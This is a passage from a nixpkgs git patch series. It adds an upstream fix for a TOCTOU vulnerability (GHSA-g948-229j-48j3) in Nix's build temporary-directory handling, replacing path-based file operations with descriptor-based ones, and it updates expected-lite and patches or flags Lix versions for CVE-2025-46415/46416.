+ + Change-Id: I2d800740cb4f9912e64c923120d3f977c58ccb7e + Signed-off-by: Raito Bezarius + +Signed-off-by: Jörg Thalheim +--- + src/libstore/local-store.cc | 4 +- + .../unix/build/local-derivation-goal.cc | 46 ++++++++++++++---- + .../nix/store/build/local-derivation-goal.hh | 20 ++++++++ + src/libutil/file-content-address.cc | 2 +- + src/libutil/file-system.cc | 47 +++++++++++-------- + src/libutil/include/nix/util/file-system.hh | 14 ++++-- + 6 files changed, 98 insertions(+), 35 deletions(-) + +diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc +index f3bee6953..eddc87ef9 100644 +--- a/src/libstore/local-store.cc ++++ b/src/libstore/local-store.cc +@@ -249,7 +249,7 @@ LocalStore::LocalStore( + else if (curSchema == 0) { /* new store */ + curSchema = nixSchemaVersion; + openDB(*state, true); +- writeFile(schemaPath, fmt("%1%", curSchema), 0666, true); ++ writeFile(schemaPath, fmt("%1%", curSchema), 0666, FsSync::Yes); + } + + else if (curSchema < nixSchemaVersion) { +@@ -300,7 +300,7 @@ LocalStore::LocalStore( + txn.commit(); + } + +- writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true); ++ writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, FsSync::Yes); + + lockFile(globalLock.get(), ltRead, true); + } +diff --git a/src/libstore/unix/build/local-derivation-goal.cc b/src/libstore/unix/build/local-derivation-goal.cc +index 9edb6fb0f..a0442d0b8 100644 +--- a/src/libstore/unix/build/local-derivation-goal.cc ++++ b/src/libstore/unix/build/local-derivation-goal.cc +@@ -567,7 +567,14 @@ void LocalDerivationGoal::startBuilder() + } else { + tmpDir = topTmpDir; + } +- chownToBuilder(tmpDir); ++ ++ /* The TOCTOU between the previous mkdir call and this open call is unavoidable due to ++ POSIX semantics.*/ ++ tmpDirFd = AutoCloseFD{open(tmpDir.c_str(), O_RDONLY | O_NOFOLLOW | O_DIRECTORY)}; ++ if (!tmpDirFd) ++ throw SysError("failed to open the build temporary directory descriptor '%1%'", tmpDir); ++ ++ chownToBuilder(tmpDirFd.get(), tmpDir); + + for (auto & [outputName, status] : initialOutputs) { + /* Set scratch path we'll actually use during the build. 
+@@ -1159,9 +1166,7 @@ void LocalDerivationGoal::initTmpDir() + } else { + auto hash = hashString(HashAlgorithm::SHA256, i.first); + std::string fn = ".attr-" + hash.to_string(HashFormat::Nix32, false); +- Path p = tmpDir + "/" + fn; +- writeFile(p, rewriteStrings(i.second, inputRewrites)); +- chownToBuilder(p); ++ writeBuilderFile(fn, rewriteStrings(i.second, inputRewrites)); + env[i.first + "Path"] = tmpDirInSandbox + "/" + fn; + } + } +@@ -1266,11 +1271,9 @@ void LocalDerivationGoal::writeStructuredAttrs() + + auto jsonSh = writeStructuredAttrsShell(json); + +- writeFile(tmpDir + "/.attrs.sh", rewriteStrings(jsonSh, inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.sh"); ++ writeBuilderFile(".attrs.sh", rewriteStrings(jsonSh, inputRewrites)); + env["NIX_ATTRS_SH_FILE"] = tmpDirInSandbox + "/.attrs.sh"; +- writeFile(tmpDir + "/.attrs.json", rewriteStrings(json.dump(), inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.json"); ++ writeBuilderFile(".attrs.json", rewriteStrings(json.dump(), inputRewrites)); + env["NIX_ATTRS_JSON_FILE"] = tmpDirInSandbox + "/.attrs.json"; + } + } +@@ -1781,6 +1784,24 @@ void setupSeccomp() + #endif + } + ++void LocalDerivationGoal::chownToBuilder(int fd, const Path & path) ++{ ++ if (!buildUser) return; ++ if (fchown(fd, buildUser->getUID(), buildUser->getGID()) == -1) ++ throw SysError("cannot change ownership of file '%1%'", path); ++} ++ ++void LocalDerivationGoal::writeBuilderFile( ++ const std::string & name, ++ std::string_view contents) ++{ ++ auto path = std::filesystem::path(tmpDir) / name; ++ AutoCloseFD fd{openat(tmpDirFd.get(), name.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC | O_EXCL | O_NOFOLLOW, 0666)}; ++ if (!fd) ++ throw SysError("creating file %s", path); ++ writeFile(fd, path, contents); ++ chownToBuilder(fd.get(), path); ++} + + void LocalDerivationGoal::runChild() + { +@@ -3000,6 +3021,15 @@ void LocalDerivationGoal::checkOutputs(const std::mapisBuiltin()) { +diff --git a/src/libstore/unix/include/nix/store/build/local-derivation-goal.hh b/src/libstore/unix/include/nix/store/build/local-derivation-goal.hh +index 795286a01..fb62e3ca4 100644 +--- a/src/libstore/unix/include/nix/store/build/local-derivation-goal.hh ++++ b/src/libstore/unix/include/nix/store/build/local-derivation-goal.hh +@@ -37,6 +37,11 @@ struct LocalDerivationGoal : public DerivationGoal + */ + Path topTmpDir; + ++ /** ++ * The file descriptor of the temporary directory. ++ */ ++ AutoCloseFD tmpDirFd; ++ + /** + * The path of the temporary directory in the sandbox. + */ +@@ -239,9 +244,24 @@ struct LocalDerivationGoal : public DerivationGoal + + /** + * Make a file owned by the builder. ++ * ++ * SAFETY: this function is prone to TOCTOU as it receives a path and not a descriptor. ++ * It's only safe to call in a child of a directory only visible to the owner. + */ + void chownToBuilder(const Path & path); + ++ /** ++ * Make a file owned by the builder addressed by its file descriptor. ++ */ ++ void chownToBuilder(int fd, const Path & path); ++ ++ /** ++ * Create a file in `tmpDir` owned by the builder. 
++ */ ++ void writeBuilderFile( ++ const std::string & name, ++ std::string_view contents); ++ + int getChildStatus() override; + + /** +diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc +index 142bc70d5..d95781691 100644 +--- a/src/libutil/file-content-address.cc ++++ b/src/libutil/file-content-address.cc +@@ -93,7 +93,7 @@ void restorePath( + { + switch (method) { + case FileSerialisationMethod::Flat: +- writeFile(path, source, 0666, startFsync); ++ writeFile(path, source, 0666, startFsync ? FsSync::Yes : FsSync::No); + break; + case FileSerialisationMethod::NixArchive: + restorePath(path, source, startFsync); +diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc +index 9ce3682f1..204a63c4e 100644 +--- a/src/libutil/file-system.cc ++++ b/src/libutil/file-system.cc +@@ -298,7 +298,7 @@ void readFile(const Path & path, Sink & sink) + } + + +-void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync) ++void writeFile(const Path & path, std::string_view s, mode_t mode, FsSync sync) + { + AutoCloseFD fd = toDescriptor(open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT + // TODO +@@ -308,22 +308,29 @@ void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync) + , mode)); + if (!fd) + throw SysError("opening file '%1%'", path); ++ ++ writeFile(fd, path, s, mode, sync); ++ ++ /* Close explicitly to propagate the exceptions. */ ++ fd.close(); ++} ++ ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode, FsSync sync) ++{ ++ assert(fd); + try { + writeFull(fd.get(), s); ++ ++ if (sync == FsSync::Yes) ++ fd.fsync(); ++ + } catch (Error & e) { +- e.addTrace({}, "writing file '%1%'", path); ++ e.addTrace({}, "writing file '%1%'", origPath); + throw; + } +- if (sync) +- fd.fsync(); +- // Explicitly close to make sure exceptions are propagated. +- fd.close(); +- if (sync) +- syncParent(path); + } + +- +-void writeFile(const Path & path, Source & source, mode_t mode, bool sync) ++void writeFile(const Path & path, Source & source, mode_t mode, FsSync sync) + { + AutoCloseFD fd = toDescriptor(open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT + // TODO +@@ -347,11 +354,11 @@ void writeFile(const Path & path, Source & source, mode_t mode, bool sync) + e.addTrace({}, "writing file '%1%'", path); + throw; + } +- if (sync) ++ if (sync == FsSync::Yes) + fd.fsync(); + // Explicitly close to make sure exceptions are propagated. + fd.close(); +- if (sync) ++ if (sync == FsSync::Yes) + syncParent(path); + } + +@@ -414,7 +421,8 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + #ifndef _WIN32 + checkInterrupt(); + +- std::string name(baseNameOf(path.native())); ++ std::string name(path.filename()); ++ assert(name != "." && name != ".." && !name.empty()); + + struct stat st; + if (fstatat(parentfd, name.c_str(), &st, +@@ -455,7 +463,7 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + throw SysError("chmod %1%", path); + } + +- int fd = openat(parentfd, path.c_str(), O_RDONLY); ++ int fd = openat(parentfd, name.c_str(), O_RDONLY | O_DIRECTORY | O_NOFOLLOW); + if (fd == -1) + throw SysError("opening directory %1%", path); + AutoCloseDir dir(fdopendir(fd)); +@@ -467,7 +475,7 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + checkInterrupt(); + std::string childName = dirent->d_name; + if (childName == "." 
|| childName == "..") continue; +- _deletePath(dirfd(dir.get()), path + "/" + childName, bytesFreed); ++ _deletePath(dirfd(dir.get()), path / childName, bytesFreed); + } + if (errno) throw SysError("reading directory %1%", path); + } +@@ -485,14 +493,13 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + + static void _deletePath(const fs::path & path, uint64_t & bytesFreed) + { +- Path dir = dirOf(path.string()); +- if (dir == "") +- dir = "/"; ++ assert(path.is_absolute()); ++ assert(path.parent_path() != path); + +- AutoCloseFD dirfd = toDescriptor(open(dir.c_str(), O_RDONLY)); ++ AutoCloseFD dirfd = toDescriptor(open(path.parent_path().string().c_str(), O_RDONLY)); + if (!dirfd) { + if (errno == ENOENT) return; +- throw SysError("opening directory '%1%'", path); ++ throw SysError("opening directory %s", path.parent_path()); + } + + _deletePath(dirfd.get(), path, bytesFreed); +diff --git a/src/libutil/include/nix/util/file-system.hh b/src/libutil/include/nix/util/file-system.hh +index e6b1cfef3..9a0057bbe 100644 +--- a/src/libutil/include/nix/util/file-system.hh ++++ b/src/libutil/include/nix/util/file-system.hh +@@ -193,21 +193,27 @@ std::string readFile(const Path & path); + std::string readFile(const std::filesystem::path & path); + void readFile(const Path & path, Sink & sink); + ++enum struct FsSync { Yes, No }; ++ + /** + * Write a string to a file. + */ +-void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, bool sync = false); +-static inline void writeFile(const std::filesystem::path & path, std::string_view s, mode_t mode = 0666, bool sync = false) ++void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++static inline void writeFile(const std::filesystem::path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No) + { + return writeFile(path.string(), s, mode, sync); + } + +-void writeFile(const Path & path, Source & source, mode_t mode = 0666, bool sync = false); +-static inline void writeFile(const std::filesystem::path & path, Source & source, mode_t mode = 0666, bool sync = false) ++void writeFile(const Path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++static inline void writeFile(const std::filesystem::path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No) + { + return writeFile(path.string(), source, mode, sync); + } + ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ + /** + * Flush a path's parent directory to disk. + */ +-- +2.44.1 + From 923146e9275bd0a4331669c1c9f800fe59253b23 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= Date: Sun, 22 Jun 2025 18:52:59 +0200 Subject: [PATCH 61/73] nixComponents_2_29: add patch for GHSA-g948-229j-48j3 This addresses a TOCTOU (Time-of-Check to Time-of-Use) vulnerability in Nix's build system that could potentially allow privilege escalation or unauthorized file access during the build process. 
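One detail worth calling out (an illustrative sketch only, mirroring the patch
below rather than adding anything new): the easy-to-misread boolean `sync`
parameter of `writeFile()` is replaced by an enum, so call sites now state
their intent explicitly:

    enum struct FsSync { Yes, No };

    // Before: the bare 'true' gives no hint that it means "fsync after write".
    writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true);

    // After: unambiguous at the call site.
    writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, FsSync::Yes);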
The patch includes: - Safe file operations using file descriptors - Secure temporary directory handling - Safe chown operations - PassAsFile security improvements - Path validation fixes --- pkgs/tools/package-management/nix/default.nix | 28 +- .../patches/ghsa-g948-229j-48j3-2.29.patch | 449 ++++++++++++++++++ 2 files changed, 464 insertions(+), 13 deletions(-) create mode 100644 pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.29.patch diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix index 97fb2eac30ef..449da9289815 100644 --- a/pkgs/tools/package-management/nix/default.nix +++ b/pkgs/tools/package-management/nix/default.nix @@ -189,19 +189,21 @@ lib.makeExtensible ( self_attribute_name = "nix_2_28"; }; - nixComponents_2_29 = nixDependencies.callPackage ./modular/packages.nix rec { - version = "2.29.0"; - inherit (self.nix_2_24.meta) maintainers teams; - otherSplices = generateSplicesForNixComponents "nixComponents_2_29"; - src = fetchFromGitHub { - # FIXME: back to NixOS org once they fix it - owner = "vcunat"; - repo = "nix"; - rev = "p/jq-1.8.0"; # just a tiny test-only patch atop 2.29.0 - # see https://github.com/NixOS/nix/pull/13371 - hash = "sha256-F2ZODsET4cBsgsyOi8Sg/quESU0DnrYri0hYniqu37k="; - }; - }; + nixComponents_2_29 = + (nixDependencies.callPackage ./modular/packages.nix rec { + version = "2.29.0"; + inherit (self.nix_2_24.meta) maintainers teams; + otherSplices = generateSplicesForNixComponents "nixComponents_2_29"; + src = fetchFromGitHub { + # FIXME: back to NixOS org once they fix it + owner = "vcunat"; + repo = "nix"; + rev = "p/jq-1.8.0"; # just a tiny test-only patch atop 2.29.0 + # see https://github.com/NixOS/nix/pull/13371 + hash = "sha256-F2ZODsET4cBsgsyOi8Sg/quESU0DnrYri0hYniqu37k="; + }; + }).appendPatches + [ ./patches/ghsa-g948-229j-48j3-2.29.patch ]; nix_2_29 = addTests "nix_2_29" self.nixComponents_2_29.nix-everything; diff --git a/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.29.patch b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.29.patch new file mode 100644 index 000000000000..265c2580cfe7 --- /dev/null +++ b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.29.patch @@ -0,0 +1,449 @@ +From 01619fbe2dc06b79609b95b6f95ddbf4e871e762 Mon Sep 17 00:00:00 2001 +From: Eelco Dolstra +Date: Thu, 19 Jun 2025 16:20:34 +0200 +Subject: [PATCH] Fixes for GHSA-g948-229j-48j3 +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Squashed commit of the following: + +commit 04fff3a637d455cbb1d75937a235950e43008db9 +Author: Eelco Dolstra +Date: Thu Jun 12 12:30:32 2025 +0200 + + Chown structured attr files safely + +commit 5417ad445e414c649d0cfc71a05661c7bf8f3ef5 +Author: Eelco Dolstra +Date: Thu Jun 12 12:14:04 2025 +0200 + + Replace 'bool sync' with an enum for clarity + + And drop writeFileAndSync(). + +commit 7ae0141f328d8e8e1094be24665789c05f974ba6 +Author: Eelco Dolstra +Date: Thu Jun 12 11:35:28 2025 +0200 + + Drop guessOrInventPathFromFD() + + No need to do hacky stuff like that when we already know the original path. 
+ +commit 45b05098bd019da7c57cd4227a89bfd0fa65bb08 +Author: Eelco Dolstra +Date: Thu Jun 12 11:15:58 2025 +0200 + + Tweak comment + +commit 0af15b31209d1b7ec8addfae9a1a6b60d8f35848 +Author: Raito Bezarius +Date: Thu Mar 27 12:22:26 2025 +0100 + + libstore: ensure that temporary directory is always 0o000 before deletion + + In the case the deletion fails, we should ensure that the temporary + directory cannot be used for nefarious purposes. + + Change-Id: I498a2dd0999a74195d13642f44a5de1e69d46120 + Signed-off-by: Raito Bezarius + +commit 2c20fa37b15cfa03ac6a1a6a47cdb2ed66c0827e +Author: Raito Bezarius +Date: Wed Mar 26 12:42:55 2025 +0100 + + libutil: ensure that `_deletePath` does NOT use absolute paths with dirfds + + When calling `_deletePath` with a parent file descriptor, `openat` is + made effective by using relative paths to the directory file descriptor. + + To avoid the problem, the signature is changed to resist misuse with an + assert in the prologue of the function. + + Change-Id: I6b3fc766bad2afe54dc27d47d1df3873e188de96 + Signed-off-by: Raito Bezarius + +commit d3c370bbcae48bb825ce19fd0f73bb4eefd2c9ea +Author: Raito Bezarius +Date: Wed Mar 26 01:07:47 2025 +0100 + + libstore: ensure that `passAsFile` is created in the original temp dir + + This ensures that `passAsFile` data is created inside the expected + temporary build directory by `openat()` from the parent directory file + descriptor. + + This avoids a TOCTOU which is part of the attack chain of CVE-????. + + Change-Id: Ie5273446c4a19403088d0389ae8e3f473af8879a + Signed-off-by: Raito Bezarius + +commit 45d3598724f932d024ef6bc2ffb00c1bb90e6018 +Author: Raito Bezarius +Date: Wed Mar 26 01:06:03 2025 +0100 + + libutil: writeFile variant for file descriptors + + `writeFile` lose its `sync` boolean flag to make things simpler. + + A new `writeFileAndSync` function is created and all call sites are + converted to it. + + Change-Id: Ib871a5283a9c047db1e4fe48a241506e4aab9192 + Signed-off-by: Raito Bezarius + +commit 732bd9b98cabf4aaf95a01fd318923de303f9996 +Author: Raito Bezarius +Date: Wed Mar 26 01:05:34 2025 +0100 + + libstore: chown to builder variant for file descriptors + + We use it immediately for the build temporary directory. + + Change-Id: I180193c63a2b98721f5fb8e542c4e39c099bb947 + Signed-off-by: Raito Bezarius + +commit 962c65f8dcd5570dd92c72370a862c7b38942e0d +Author: Raito Bezarius +Date: Wed Mar 26 01:04:59 2025 +0100 + + libstore: open build directory as a dirfd as well + + We now keep around a proper AutoCloseFD around the temporary directory + which we plan to use for openat operations and avoiding the build + directory being swapped out while we are doing something else. + + Change-Id: I18d387b0f123ebf2d20c6405cd47ebadc5505f2a + Signed-off-by: Raito Bezarius + +commit c9b42462b75b5a37ee6564c2b53cff186c8323da +Author: Raito Bezarius +Date: Wed Mar 26 01:04:12 2025 +0100 + + libutil: guess or invent a path from file descriptors + + This is useful for certain error recovery paths (no pun intended) that + does not thread through the original path name. 
+ + Change-Id: I2d800740cb4f9912e64c923120d3f977c58ccb7e + Signed-off-by: Raito Bezarius + +Signed-off-by: Jörg Thalheim +--- + src/libstore/local-store.cc | 4 +- + src/libstore/unix/build/derivation-builder.cc | 66 ++++++++++++++++--- + src/libutil/file-content-address.cc | 2 +- + src/libutil/file-system.cc | 47 +++++++------ + src/libutil/include/nix/util/file-system.hh | 14 ++-- + 5 files changed, 98 insertions(+), 35 deletions(-) + +diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc +index 76fadba86..1ab3ed13a 100644 +--- a/src/libstore/local-store.cc ++++ b/src/libstore/local-store.cc +@@ -247,7 +247,7 @@ LocalStore::LocalStore(ref config) + else if (curSchema == 0) { /* new store */ + curSchema = nixSchemaVersion; + openDB(*state, true); +- writeFile(schemaPath, fmt("%1%", curSchema), 0666, true); ++ writeFile(schemaPath, fmt("%1%", curSchema), 0666, FsSync::Yes); + } + + else if (curSchema < nixSchemaVersion) { +@@ -298,7 +298,7 @@ LocalStore::LocalStore(ref config) + txn.commit(); + } + +- writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true); ++ writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, FsSync::Yes); + + lockFile(globalLock.get(), ltRead, true); + } +diff --git a/src/libstore/unix/build/derivation-builder.cc b/src/libstore/unix/build/derivation-builder.cc +index 58e8d8ba6..856bc81c3 100644 +--- a/src/libstore/unix/build/derivation-builder.cc ++++ b/src/libstore/unix/build/derivation-builder.cc +@@ -129,6 +129,11 @@ private: + */ + Path topTmpDir; + ++ /** ++ * The file descriptor of the temporary directory. ++ */ ++ AutoCloseFD tmpDirFd; ++ + /** + * The path of the temporary directory in the sandbox. + */ +@@ -325,9 +330,24 @@ private: + + /** + * Make a file owned by the builder. ++ * ++ * SAFETY: this function is prone to TOCTOU as it receives a path and not a descriptor. ++ * It's only safe to call in a child of a directory only visible to the owner. + */ + void chownToBuilder(const Path & path); + ++ /** ++ * Make a file owned by the builder addressed by its file descriptor. ++ */ ++ void chownToBuilder(int fd, const Path & path); ++ ++ /** ++ * Create a file in `tmpDir` owned by the builder. ++ */ ++ void writeBuilderFile( ++ const std::string & name, ++ std::string_view contents); ++ + /** + * Run the builder's process. + */ +@@ -895,7 +915,14 @@ void DerivationBuilderImpl::startBuilder() + } else { + tmpDir = topTmpDir; + } +- chownToBuilder(tmpDir); ++ ++ /* The TOCTOU between the previous mkdir call and this open call is unavoidable due to ++ POSIX semantics.*/ ++ tmpDirFd = AutoCloseFD{open(tmpDir.c_str(), O_RDONLY | O_NOFOLLOW | O_DIRECTORY)}; ++ if (!tmpDirFd) ++ throw SysError("failed to open the build temporary directory descriptor '%1%'", tmpDir); ++ ++ chownToBuilder(tmpDirFd.get(), tmpDir); + + for (auto & [outputName, status] : initialOutputs) { + /* Set scratch path we'll actually use during the build. 
+@@ -1469,9 +1496,7 @@ void DerivationBuilderImpl::initTmpDir() + } else { + auto hash = hashString(HashAlgorithm::SHA256, i.first); + std::string fn = ".attr-" + hash.to_string(HashFormat::Nix32, false); +- Path p = tmpDir + "/" + fn; +- writeFile(p, rewriteStrings(i.second, inputRewrites)); +- chownToBuilder(p); ++ writeBuilderFile(fn, rewriteStrings(i.second, inputRewrites)); + env[i.first + "Path"] = tmpDirInSandbox + "/" + fn; + } + } +@@ -1580,11 +1605,9 @@ void DerivationBuilderImpl::writeStructuredAttrs() + + auto jsonSh = StructuredAttrs::writeShell(json); + +- writeFile(tmpDir + "/.attrs.sh", rewriteStrings(jsonSh, inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.sh"); ++ writeBuilderFile(".attrs.sh", rewriteStrings(jsonSh, inputRewrites)); + env["NIX_ATTRS_SH_FILE"] = tmpDirInSandbox + "/.attrs.sh"; +- writeFile(tmpDir + "/.attrs.json", rewriteStrings(json.dump(), inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.json"); ++ writeBuilderFile(".attrs.json", rewriteStrings(json.dump(), inputRewrites)); + env["NIX_ATTRS_JSON_FILE"] = tmpDirInSandbox + "/.attrs.json"; + } + } +@@ -1838,6 +1861,24 @@ void setupSeccomp() + #endif + } + ++void DerivationBuilderImpl::chownToBuilder(int fd, const Path & path) ++{ ++ if (!buildUser) return; ++ if (fchown(fd, buildUser->getUID(), buildUser->getGID()) == -1) ++ throw SysError("cannot change ownership of file '%1%'", path); ++} ++ ++void DerivationBuilderImpl::writeBuilderFile( ++ const std::string & name, ++ std::string_view contents) ++{ ++ auto path = std::filesystem::path(tmpDir) / name; ++ AutoCloseFD fd{openat(tmpDirFd.get(), name.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC | O_EXCL | O_NOFOLLOW, 0666)}; ++ if (!fd) ++ throw SysError("creating file %s", path); ++ writeFile(fd, path, contents); ++ chownToBuilder(fd.get(), path); ++} + + void DerivationBuilderImpl::runChild() + { +@@ -3043,6 +3084,15 @@ void DerivationBuilderImpl::checkOutputs(const std::mapd_name; + if (childName == "." || childName == "..") continue; +- _deletePath(dirfd(dir.get()), path + "/" + childName, bytesFreed); ++ _deletePath(dirfd(dir.get()), path / childName, bytesFreed); + } + if (errno) throw SysError("reading directory %1%", path); + } +@@ -490,14 +498,13 @@ static void _deletePath(Descriptor parentfd, const std::filesystem::path & path, + + static void _deletePath(const std::filesystem::path & path, uint64_t & bytesFreed) + { +- Path dir = dirOf(path.string()); +- if (dir == "") +- dir = "/"; ++ assert(path.is_absolute()); ++ assert(path.parent_path() != path); + +- AutoCloseFD dirfd = toDescriptor(open(dir.c_str(), O_RDONLY)); ++ AutoCloseFD dirfd = toDescriptor(open(path.parent_path().string().c_str(), O_RDONLY)); + if (!dirfd) { + if (errno == ENOENT) return; +- throw SysError("opening directory '%1%'", path); ++ throw SysError("opening directory %s", path.parent_path()); + } + + _deletePath(dirfd.get(), path, bytesFreed); +diff --git a/src/libutil/include/nix/util/file-system.hh b/src/libutil/include/nix/util/file-system.hh +index b8fa4cfa0..a9a6e43bf 100644 +--- a/src/libutil/include/nix/util/file-system.hh ++++ b/src/libutil/include/nix/util/file-system.hh +@@ -175,21 +175,27 @@ std::string readFile(const Path & path); + std::string readFile(const std::filesystem::path & path); + void readFile(const Path & path, Sink & sink, bool memory_map = true); + ++enum struct FsSync { Yes, No }; ++ + /** + * Write a string to a file. 
+ */ +-void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, bool sync = false); +-static inline void writeFile(const std::filesystem::path & path, std::string_view s, mode_t mode = 0666, bool sync = false) ++void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++static inline void writeFile(const std::filesystem::path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No) + { + return writeFile(path.string(), s, mode, sync); + } + +-void writeFile(const Path & path, Source & source, mode_t mode = 0666, bool sync = false); +-static inline void writeFile(const std::filesystem::path & path, Source & source, mode_t mode = 0666, bool sync = false) ++void writeFile(const Path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++static inline void writeFile(const std::filesystem::path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No) + { + return writeFile(path.string(), source, mode, sync); + } + ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ + /** + * Flush a path's parent directory to disk. + */ +-- +2.44.1 + From ccae07c83616b952afce5cfea6ae4d1894f1bc76 Mon Sep 17 00:00:00 2001 From: "R. Ryantm" Date: Tue, 24 Jun 2025 14:18:13 +0000 Subject: [PATCH 62/73] expected-lite: 0.8.0 -> 0.9.0 --- pkgs/by-name/ex/expected-lite/package.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/by-name/ex/expected-lite/package.nix b/pkgs/by-name/ex/expected-lite/package.nix index 80e94ff8815d..a221daa4ba56 100644 --- a/pkgs/by-name/ex/expected-lite/package.nix +++ b/pkgs/by-name/ex/expected-lite/package.nix @@ -8,13 +8,13 @@ stdenv.mkDerivation rec { pname = "expected-lite"; - version = "0.8.0"; + version = "0.9.0"; src = fetchFromGitHub { owner = "martinmoene"; repo = "expected-lite"; rev = "v${version}"; - hash = "sha256-8Lf+R7wC7f2YliXqhR6pwVVSLZ6qheu7YOV5jHc0Cjc="; + hash = "sha256-LRXxUaDQT5q9dXK2uYFvCgEuGWEHKr95lfdGTGjke0g="; }; nativeBuildInputs = [ From c2da8de4d1d618e830b0a18e09626e2fbdf6560b Mon Sep 17 00:00:00 2001 From: Raito Bezarius Date: Tue, 24 Jun 2025 15:43:15 +0200 Subject: [PATCH 63/73] lixPackageSets.lix_2_90: mark as vulnerable Change-Id: I10fedc7098aaddb0df67acb76fe730ddd8883319 Signed-off-by: Raito Bezarius --- pkgs/tools/package-management/lix/common-lix.nix | 2 ++ pkgs/tools/package-management/lix/default.nix | 4 ++++ 2 files changed, 6 insertions(+) diff --git a/pkgs/tools/package-management/lix/common-lix.nix b/pkgs/tools/package-management/lix/common-lix.nix index 9b666e5e78fb..077c4617698c 100644 --- a/pkgs/tools/package-management/lix/common-lix.nix +++ b/pkgs/tools/package-management/lix/common-lix.nix @@ -9,6 +9,7 @@ # `lix-doc`. docCargoDeps ? null, patches ? [ ], + knownVulnerabilities ? 
[ ], }@args: assert lib.assertMsg ( @@ -389,5 +390,6 @@ stdenv.mkDerivation (finalAttrs: { platforms = lib.platforms.unix; outputsToInstall = [ "out" ] ++ lib.optional enableDocumentation "man"; mainProgram = "nix"; + inherit knownVulnerabilities; }; }) diff --git a/pkgs/tools/package-management/lix/default.nix b/pkgs/tools/package-management/lix/default.nix index c6d905d78048..44003670e12d 100644 --- a/pkgs/tools/package-management/lix/default.nix +++ b/pkgs/tools/package-management/lix/default.nix @@ -133,6 +133,10 @@ lib.makeExtensible (self: { sourceRoot = "${src.name or src}/lix-doc"; hash = "sha256-VPcrf78gfLlkTRrcbLkPgLOk0o6lsOJBm6HYLvavpNU="; }; + + knownVulnerabilities = [ + "Lix 2.90 is vulnerable to CVE-2025-46415 and CVE-2025-46416 and will not receive updates." + ]; }; nix-eval-jobs-args = { From be4026079c96792b6cc0723bd3b40c72b8202060 Mon Sep 17 00:00:00 2001 From: Raito Bezarius Date: Tue, 24 Jun 2025 15:43:37 +0200 Subject: [PATCH 64/73] lixPackageSets.lix_2_91: patch for CVE-2025-4641{5,6} Change-Id: I8042bca710f047ca3c312c6fa7c8227d96f328d4 Signed-off-by: Raito Bezarius --- pkgs/tools/package-management/lix/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/tools/package-management/lix/default.nix b/pkgs/tools/package-management/lix/default.nix index 44003670e12d..6deb817e9151 100644 --- a/pkgs/tools/package-management/lix/default.nix +++ b/pkgs/tools/package-management/lix/default.nix @@ -154,13 +154,13 @@ lib.makeExtensible (self: { attrName = "lix_2_91"; lix-args = rec { - version = "2.91.1"; + version = "2.91.2"; src = fetchFromGitHub { owner = "lix-project"; repo = "lix"; rev = version; - hash = "sha256-hiGtfzxFkDc9TSYsb96Whg0vnqBVV7CUxyscZNhed0U="; + hash = "sha256-TkRjskDnxMPugdLQE/LqIh59RYQFJLYpIuL8YZva2lM="; }; docCargoDeps = rustPlatform.fetchCargoVendor { From 69bd6a53159da314523febbaa597810952131c34 Mon Sep 17 00:00:00 2001 From: Raito Bezarius Date: Tue, 24 Jun 2025 15:44:48 +0200 Subject: [PATCH 65/73] lixPackageSets.lix_2_93: patch for CVE-2025-4641{5,6} Change-Id: I724ca7bc993594d8b1b262202e423021f6288548 Signed-off-by: Raito Bezarius --- pkgs/tools/package-management/lix/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/tools/package-management/lix/default.nix 